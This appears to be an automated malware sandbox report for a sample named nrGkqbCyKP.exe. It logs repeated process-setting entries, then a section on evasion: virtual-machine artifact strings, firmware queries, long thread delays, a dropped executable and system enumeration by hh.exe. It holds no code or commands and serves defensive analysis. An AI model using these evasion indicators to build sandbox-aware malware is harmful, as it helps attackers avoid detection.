Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Windows\hh.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{05DF8D13-C355-47F4-A11E-851B338CEFB8}Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeMemory allocated: 1030000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeMemory allocated: 2990000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeMemory allocated: 4990000 memory reserve | memory write watchJump to behavior
Source: C:\Windows\explorer.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeWindow / User API: threadDelayed 2178Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeWindow / User API: threadDelayed 7659Jump to behavior
Source: C:\Windows\hh.exeWindow / User API: threadDelayed 1904Jump to behavior
Source: C:\Windows\hh.exeWindow / User API: threadDelayed 2940Jump to behavior
Source: C:\Windows\hh.exeWindow / User API: threadDelayed 4563Jump to behavior
Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 812Jump to behavior
Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 784Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeDropped PE file which has not been started: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\libcefJump to dropped file
Source: C:\Windows\hh.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeAPI coverage: 0.6 %
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeAPI coverage: 4.9 %
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeAPI coverage: 0.5 %
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -28592453314249787s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -100000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -99875s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -99766s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -99656s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -99547s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -99437s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -99328s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -99218s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -99109s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -99000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -98891s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -98766s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -98656s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -98547s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -98437s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -98328s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -98219s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -98109s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -98000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -97891s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -97780s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -97671s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -97562s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -97453s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -97344s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -97234s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -97124s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -97016s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -96906s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -96797s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -96687s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -96578s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -96469s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -96359s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -96250s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -96141s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -96031s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -95907s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -95781s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -95670s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -95520s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -95281s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -95108s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -95000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -94887s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -94781s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -94672s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -94562s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -94453s >= -30000sJump to behavior
Source: C:\Windows\hh.exe TID: 6992Thread sleep count: 1904 > 30Jump to behavior
Source: C:\Windows\hh.exe TID: 6992Thread sleep time: -1904000s >= -30000sJump to behavior
Source: C:\Windows\hh.exe TID: 5960Thread sleep count: 2940 > 30Jump to behavior
Source: C:\Windows\hh.exe TID: 6992Thread sleep count: 4563 > 30Jump to behavior
Source: C:\Windows\hh.exe TID: 6992Thread sleep time: -4563000s >= -30000sJump to behavior
Source: C:\Windows\hh.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 6_2_00007FFBC1B40E70 FindFirstFileExW,FindClose,wcscpy_s,6_2_00007FFBC1B40E70
Source: C:\Windows\hh.exeCode function: 8_2_000001E47C4EF350 CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,CreateFileW,WriteFile,FindFirstFileW,_invalid_parameter_noinfo_noreturn,8_2_000001E47C4EF350
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD260E70 FindFirstFileExW,FindClose,wcscpy_s,22_2_00007FFBAD260E70
Source: C:\Windows\hh.exeCode function: 8_2_000001E47C4E6370 gethostname,gethostbyname,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetSystemInfo,GetDriveTypeW,GetDiskFreeSpaceExW,GlobalMemoryStatusEx,GetNativeSystemInfo,K32GetProcessImageFileNameW,GetLogicalDriveStringsW,CoInitializeEx,CoCreateInstance,RegOpenKeyExW,GetLocaleInfoW,GetCurrentHwProfileW,RegOpenKeyExW,RegDeleteValueW,RegCreateKeyW,RegSetValueExW,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,8_2_000001E47C4E6370
Source: C:\Windows\hh.exeCode function: 8_2_000001E47C4E6370 gethostname,gethostbyname,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetSystemInfo,GetDriveTypeW,GetDiskFreeSpaceExW,GlobalMemoryStatusEx,GetNativeSystemInfo,K32GetProcessImageFileNameW,GetLogicalDriveStringsW,CoInitializeEx,CoCreateInstance,RegOpenKeyExW,GetLocaleInfoW,GetCurrentHwProfileW,RegOpenKeyExW,RegDeleteValueW,RegCreateKeyW,RegSetValueExW,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,8_2_000001E47C4E6370
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeThread delayed: delay time: 100000Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeThread delayed: delay time: 99875Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeThread delayed: delay time: 99766Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeThread delayed: delay time: 99656Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeThread delayed: delay time: 99547Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeThread delayed: delay time: 99437Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeThread delayed: delay time: 99328Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeThread delayed: delay time: 99218Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeThread delayed: delay time: 99109Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeThread delayed: delay time: 99000Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeThread delayed: delay time: 98891Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeThread delayed: delay time: 98766Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeThread delayed: delay time: 98656Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeThread delayed: delay time: 98547Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeThread delayed: delay time: 98437Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeThread delayed: delay time: 98328Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeThread delayed: delay time: 98219Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeThread delayed: delay time: 98109Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeThread delayed: delay time: 98000Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeThread delayed: delay time: 97891Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeThread delayed: delay time: 97780Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeThread delayed: delay time: 97671Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeThread delayed: delay time: 97562Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeThread delayed: delay time: 97453Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeThread delayed: delay time: 97344Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeThread delayed: delay time: 97234Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeThread delayed: delay time: 97124Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeThread delayed: delay time: 97016Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeThread delayed: delay time: 96906Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeThread delayed: delay time: 96797Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeThread delayed: delay time: 96687Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeThread delayed: delay time: 96578Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeThread delayed: delay time: 96469Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeThread delayed: delay time: 96359Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeThread delayed: delay time: 96250Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeThread delayed: delay time: 96141Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeThread delayed: delay time: 96031Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeThread delayed: delay time: 95907Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeThread delayed: delay time: 95781Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeThread delayed: delay time: 95670Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeThread delayed: delay time: 95520Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeThread delayed: delay time: 95281Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeThread delayed: delay time: 95108Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeThread delayed: delay time: 95000Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeThread delayed: delay time: 94887Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeThread delayed: delay time: 94781Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeThread delayed: delay time: 94672Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeThread delayed: delay time: 94562Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeThread delayed: delay time: 94453Jump to behavior
Source: explorer.exe, 0000000F.00000003.2146195587.0000000008EBE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2750262921.0000000008EBE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2137904772.0000000008EBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWD Loopback Controller
Source: Amcache.hve.11.drBinary or memory string: VMware
Source: explorer.exe, 0000000C.00000002.2048969994.0000000009330000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}F
Source: explorer.exe, 0000000F.00000003.2156818481.0000000007793000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: Amcache.hve.11.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: explorer.exe, 0000000C.00000002.2048969994.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.2022719564.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2137904772.00000000090BF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2125286461.00000000090BF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2122983745.00000000090BF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2126233626.00000000090BF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2146195587.00000000090BF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2123363356.0000000008F79000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2130807598.00000000090BF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2124360952.00000000090BF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2750262921.00000000090BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: explorer.exe, 0000000F.00000002.2755898535.000000000B9FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: Amcache.hve.11.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: explorer.exe, 0000000F.00000003.2130807598.0000000009091000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2125286461.0000000009091000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2146195587.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2750262921.0000000009085000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2122983745.000000000908A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2126233626.0000000009091000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2137904772.000000000906A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
Source: explorer.exe, 0000000F.00000003.2156818481.0000000007793000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 0000000C.00000000.2022719564.0000000009255000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: explorer.exe, 0000000F.00000003.2060838154.0000000004CC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}g>
Source: explorer.exe, 0000000C.00000002.2048969994.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.2022719564.00000000090DA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en\volume.inf_loc
Source: Amcache.hve.11.drBinary or memory string: vmci.sys
Source: explorer.exe, 0000000C.00000000.2022719564.0000000009255000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
Source: explorer.exe, 0000000F.00000003.2169523059.000000000B9B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
Source: explorer.exe, 0000000F.00000003.2137904772.0000000008F1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4NECVMWar VMware SATA CD00
Source: Amcache.hve.11.drBinary or memory string: VMware20,1
Source: Amcache.hve.11.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.11.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.11.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.11.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.11.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.11.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.11.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.11.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.11.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: nrGkqbCyKP.exe, 00000000.00000002.2000645988.0000000008A02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000F.00000002.2755898535.000000000B9FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000C.00000000.2017985543.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.11.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: explorer.exe, 0000000F.00000003.2169523059.000000000B95E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00RVICE
Source: explorer.exe, 0000000F.00000003.2169072684.000000000BA62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWarVMware SATA CD001.00
Source: Amcache.hve.11.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.11.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.11.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.11.drBinary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
Source: Amcache.hve.11.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.11.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.11.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: explorer.exe, 0000000C.00000000.2017985543.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00=
Source: Amcache.hve.11.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: nrGkqbCyKP.exe, 00000000.00000002.2000645988.0000000008950000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlll
Source: explorer.exe, 0000000C.00000002.2048969994.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.2022719564.00000000090DA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: Amcache.hve.11.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.11.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: hh.exe, 00000008.00000002.2733664877.000001E47AB38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllSS
Source: explorer.exe, 0000000F.00000002.2755898535.000000000B9FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000ID$pl
Source: explorer.exe, 0000000F.00000002.2750262921.00000000090BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
